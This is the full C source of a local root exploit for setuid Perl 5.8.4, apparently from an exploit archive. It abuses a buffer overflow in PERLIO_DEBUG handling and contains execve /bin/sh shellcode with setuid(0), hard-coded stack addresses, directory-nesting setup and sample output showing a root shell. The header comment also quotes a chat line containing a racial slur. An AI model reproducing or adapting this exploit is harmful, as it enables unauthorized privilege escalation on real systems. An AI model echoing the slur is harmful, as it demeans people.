Local root exploit for the PerlIO package that makes use of a buffer overflow in PERLIO_DEBUG.
9d0552984b75d1eee91c3d55047ad2d3a217517c70c32a822a80f3f6ad4a4f98
/*
* Copyright Kevin Finisterre
*
* Setuid perl PerlIO_Debug() overflow
*
* Tested on Debian 3.1 perl-suid 5.8.4-5
*
* (11:07:20) *corezion:* who is tha man with tha masta plan?
* (11:07:36) *corezion:* a nigga with a buffer overrun
* (11:07:39) *corezion:* heh
* (of course that is to the tune of http://www.azlyrics.com/lyrics/drdre/niggawittagun.html)
*
* cc -o ex_perl2 ex_perl2.c -std=c99
*
* kfinisterre@jdam:~$ ./ex_perl2
* Dirlen: 1052
* Charlie Murphy!!!@#@
* sh-2.05b# id
* uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root)
*
*/
#include <stdlib.h>
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
int main(int *argc, char **argv)
{
int len = 23;
int count = 5;
char malpath[10000];
char tmp[256];
char *filler;
char *ptr;
unsigned char code[] =
/*
0xff-less execve() /bin/sh by anathema <anathema@hack.co.za>
Linux/IA32 0xff-less execve() shellcode.
*/
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
// setuid(0) - fix for redhat based machines
"\x31\xdb" // xorl %ebx,%ebx
"\x8d\x43\x17" // leal 0x17(%ebx),%eax
"\xcd\x80" // int $0x80
"\x89\xe6" /* movl %esp, %esi */
"\x83\xc6\x30" /* addl $0x30, %esi */
"\xb8\x2e\x62\x69\x6e" /* movl $0x6e69622e, %eax */
"\x40" /* incl %eax */
"\x89\x06" /* movl %eax, (%esi) */
"\xb8\x2e\x73\x68\x21" /* movl $0x2168732e, %eax */
"\x40" /* incl %eax */
"\x89\x46\x04" /* movl %eax, 0x04(%esi) */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */;
chdir("/tmp/");
// do one less char than usual for RedHat
filler = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/";
for (int x=0; x<4; x=x+1)
{
mkdir(filler, 0777);
chdir(filler);
// do one less char than usual for RedHat
count = count + 255;
}
memset(tmp,0x41,len);
count = count + len;
ptr = tmp+len;
ptr = putLong (ptr, 0xbffffb6a); // frame 11 ebp
ptr = putLong (ptr, 0xbffffb6a);
ptr = putLong (ptr, 0xbffffb6a);
strcat(tmp, "/");
mkdir(tmp, 0777);
chdir(tmp);
printf ("Dirlen: %d\n", count);
FILE *perlsploit;
char perldummyfile[] = {
"#!/usr/bin/sperl5.8.4\n"
"# \n"
"# Be proud that perl(1) may proclaim: \n"
"# Setuid Perl scripts are safer than C programs ...\n"
"# Do not abandon (deprecate) suidperl. Do not advocate C wrappers. \n"
};
if(!(perlsploit = fopen("take_me.pl","w+"))) {
printf("error opening file\n");
exit(1);
}
fwrite(perldummyfile,sizeof(perldummyfile)-1,1,perlsploit);
fclose(perlsploit);
getcwd(malpath, 10000);
strcat(malpath, "/");
strcat(malpath, "take_me.pl");
printf("Charlie Murphy!!!@#@\n");
chmod(malpath,0755);
setenv("PERLIO_DEBUG", "/tmp/ninjitsu", 1);
setenv("PERL5LIB", code, 1);
execv(malpath,(char *) NULL);
}
/*
* put a address in mem, for little-endian
*
*/
char*
putLong (char* ptr, long value)
{
*ptr++ = (char) (value >> 0) & 0xff;
*ptr++ = (char) (value >> 8) & 0xff;
*ptr++ = (char) (value >> 16) & 0xff;
*ptr++ = (char) (value >> 24) & 0xff;
return ptr;
}